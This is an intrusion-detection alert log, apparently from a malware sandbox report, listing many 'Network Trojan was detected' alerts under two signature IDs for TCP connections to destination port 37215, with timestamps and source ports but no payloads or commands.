                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423823
                  SID:2835222
                  Source Port:60878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.003897
                  SID:2835222
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.164570
                  SID:2835222
                  Source Port:53966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2835222
                  Source Port:49754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395852
                  SID:2829579
                  Source Port:58008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824785
                  SID:2835222
                  Source Port:57710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815715
                  SID:2835222
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.422877
                  SID:2829579
                  Source Port:60594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476215
                  SID:2835222
                  Source Port:59342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.839974
                  SID:2835222
                  Source Port:50142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428657
                  SID:2829579
                  Source Port:54204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.946860
                  SID:2835222
                  Source Port:60180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.542118
                  SID:2835222
                  Source Port:42136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.942664
                  SID:2835222
                  Source Port:35064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.983078
                  SID:2835222
                  Source Port:43126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.642671
                  SID:2835222
                  Source Port:56426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2835222
                  Source Port:42414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872664
                  SID:2835222
                  Source Port:53642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959753
                  SID:2829579
                  Source Port:53310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472890
                  SID:2829579
                  Source Port:34572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159705
                  SID:2835222
                  Source Port:60650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.435309
                  SID:2829579
                  Source Port:33182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941159
                  SID:2835222
                  Source Port:54964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.098304
                  SID:2829579
                  Source Port:56140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.435588
                  SID:2835222
                  Source Port:38920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.981367
                  SID:2835222
                  Source Port:46528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2835222
                  Source Port:34046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.283818
                  SID:2835222
                  Source Port:36714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.132533
                  SID:2835222
                  Source Port:47412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.675779
                  SID:2835222
                  Source Port:43848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.064764
                  SID:2835222
                  Source Port:51754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.393770
                  SID:2835222
                  Source Port:44214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.240968
                  SID:2829579
                  Source Port:41698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.012219
                  SID:2829579
                  Source Port:45296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.393293
                  SID:2829579
                  Source Port:37662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.174568
                  SID:2829579
                  Source Port:42610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479455
                  SID:2829579
                  Source Port:59296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008254
                  SID:2835222
                  Source Port:49002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217201
                  SID:2835222
                  Source Port:36788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655125
                  SID:2835222
                  Source Port:34110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.782637
                  SID:2829579
                  Source Port:40036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.880980
                  SID:2835222
                  Source Port:55924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.860339
                  SID:2835222
                  Source Port:33928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.476844
                  SID:2835222
                  Source Port:43752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428547
                  SID:2835222
                  Source Port:59180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.854453
                  SID:2835222
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.808477
                  SID:2835222
                  Source Port:42982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571545
                  SID:2829579
                  Source Port:48922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.770059
                  SID:2835222
                  Source Port:44012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173422
                  SID:2835222
                  Source Port:51520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.947908
                  SID:2835222
                  Source Port:44182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2829579
                  Source Port:49206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2829579
                  Source Port:42160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078859
                  SID:2835222
                  Source Port:35126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.850693
                  SID:2829579
                  Source Port:55464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106288
                  SID:2835222
                  Source Port:40358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.109229
                  SID:2829579
                  Source Port:35616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625534
                  SID:2835222
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423291
                  SID:2835222
                  Source Port:57240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.617350
                  SID:2829579
                  Source Port:42840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137908
                  SID:2829579
                  Source Port:36456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.761974
                  SID:2835222
                  Source Port:43234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679025
                  SID:2829579
                  Source Port:35994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.869473
                  SID:2835222
                  Source Port:57290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004386
                  SID:2835222
                  Source Port:51894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056183
                  SID:2829579
                  Source Port:42370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767213
                  SID:2829579
                  Source Port:55544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.631742
                  SID:2829579
                  Source Port:42392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835564
                  SID:2835222
                  Source Port:36064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823629
                  SID:2835222
                  Source Port:37986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826538
                  SID:2835222
                  Source Port:37284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2835222
                  Source Port:36412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433517
                  SID:2829579
                  Source Port:36104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.489365
                  SID:2829579
                  Source Port:57048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.264063
                  SID:2829579
                  Source Port:38994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588414
                  SID:2835222
                  Source Port:50300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792621
                  SID:2835222
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142531
                  SID:2829579
                  Source Port:53290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.216046
                  SID:2835222
                  Source Port:52764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.008673
                  SID:2829579
                  Source Port:48148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.813021
                  SID:2835222
                  Source Port:54456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591446
                  SID:2835222
                  Source Port:42450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.492179
                  SID:2835222
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.676361
                  SID:2835222
                  Source Port:58114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.672792
                  SID:2835222
                  Source Port:37552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086994
                  SID:2829579
                  Source Port:41416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.931862
                  SID:2829579
                  Source Port:46524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.537875
                  SID:2829579
                  Source Port:39340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.726781
                  SID:2829579
                  Source Port:55598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290741
                  SID:2829579
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.671572
                  SID:2829579
                  Source Port:57664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641730
                  SID:2829579
                  Source Port:58248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828075
                  SID:2835222
                  Source Port:34860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.889193
                  SID:2835222
                  Source Port:43442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.327506
                  SID:2835222
                  Source Port:47926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2829579
                  Source Port:33026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785606
                  SID:2829579
                  Source Port:53162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2835222
                  Source Port:39222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.937800
                  SID:2829579
                  Source Port:33998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809601
                  SID:2829579
                  Source Port:33642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.100122
                  SID:2829579
                  Source Port:47274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.599203
                  SID:2829579
                  Source Port:40536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165802
                  SID:2835222
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.849464
                  SID:2835222
                  Source Port:56610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.484842
                  SID:2835222
                  Source Port:58008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872706
                  SID:2835222
                  Source Port:38338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.900850
                  SID:2829579
                  Source Port:56398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.196013
                  SID:2835222
                  Source Port:51272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.553742
                  SID:2829579
                  Source Port:54812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.044130
                  SID:2829579
                  Source Port:52202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.247014
                  SID:2835222
                  Source Port:58054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.627003
                  SID:2829579
                  Source Port:53868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.867621
                  SID:2835222
                  Source Port:39250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.523161
                  SID:2835222
                  Source Port:50204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.417090
                  SID:2829579
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.839757
                  SID:2835222
                  Source Port:57184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.643122
                  SID:2829579
                  Source Port:50798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.860339
                  SID:2829579
                  Source Port:45508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474716
                  SID:2835222
                  Source Port:49716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.081502
                  SID:2829579
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.998303
                  SID:2835222
                  Source Port:52468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2835222
                  Source Port:41146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.087827
                  SID:2829579
                  Source Port:33244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.484442
                  SID:2835222
                  Source Port:33404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.350674
                  SID:2829579
                  Source Port:58424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.060305
                  SID:2829579
                  Source Port:36460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.192710
                  SID:2829579
                  Source Port:57162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.791726
                  SID:2829579
                  Source Port:39384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217527
                  SID:2829579
                  Source Port:60400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853963
                  SID:2835222
                  Source Port:39818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.879957
                  SID:2829579
                  Source Port:54884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.761974
                  SID:2835222
                  Source Port:49652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.761974
                  SID:2829579
                  Source Port:43314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.949660
                  SID:2829579
                  Source Port:60252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.165980
                  SID:2829579
                  Source Port:48474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.354295
                  SID:2835222
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.010127
                  SID:2835222
                  Source Port:48426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.999181
                  SID:2835222
                  Source Port:58810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2829579
                  Source Port:50064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865935
                  SID:2829579
                  Source Port:57056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492414
                  SID:2835222
                  Source Port:49116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.995601
                  SID:2835222
                  Source Port:40870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.093817
                  SID:2829579
                  Source Port:51428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.250485
                  SID:2829579
                  Source Port:49326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.336924
                  SID:2835222
                  Source Port:50202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.594883
                  SID:2829579
                  Source Port:37214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2829579
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.125046
                  SID:2829579
                  Source Port:44020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.729820
                  SID:2829579
                  Source Port:40104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.368823
                  SID:2835222
                  Source Port:47030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.503525
                  SID:2829579
                  Source Port:56202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478024
                  SID:2835222
                  Source Port:33702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.648834
                  SID:2829579
                  Source Port:55590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.089807
                  SID:2835222
                  Source Port:34288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862300
                  SID:2835222
                  Source Port:42104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.836737
                  SID:2835222
                  Source Port:58474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.072546
                  SID:2829579
                  Source Port:37302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.225360
                  SID:2835222
                  Source Port:51038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.610396
                  SID:2829579
                  Source Port:46220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.991473
                  SID:2835222
                  Source Port:58434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.825878
                  SID:2829579
                  Source Port:43756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.880979
                  SID:2829579
                  Source Port:45438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.588431
                  SID:2835222
                  Source Port:50002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.840448
                  SID:2835222
                  Source Port:36606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755286
                  SID:2835222
                  Source Port:57190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171769
                  SID:2829579
                  Source Port:45714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2829579
                  Source Port:40882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.882583
                  SID:2829579
                  Source Port:55124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603573
                  SID:2835222
                  Source Port:42228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2829579
                  Source Port:38812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.612080
                  SID:2835222
                  Source Port:51386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.412825
                  SID:2829579
                  Source Port:55694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480089
                  SID:2835222
                  Source Port:58714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.915755
                  SID:2829579
                  Source Port:35858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.558731
                  SID:2835222
                  Source Port:49644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.191107
                  SID:2835222
                  Source Port:38094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.796978
                  SID:2829579
                  Source Port:60614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.842206
                  SID:2835222
                  Source Port:55472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.488835
                  SID:2835222
                  Source Port:42780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.865409
                  SID:2829579
                  Source Port:57130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641366
                  SID:2829579
                  Source Port:51478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773467
                  SID:2835222
                  Source Port:37684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.209448
                  SID:2829579
                  Source Port:55426
                  Destination Port:37215
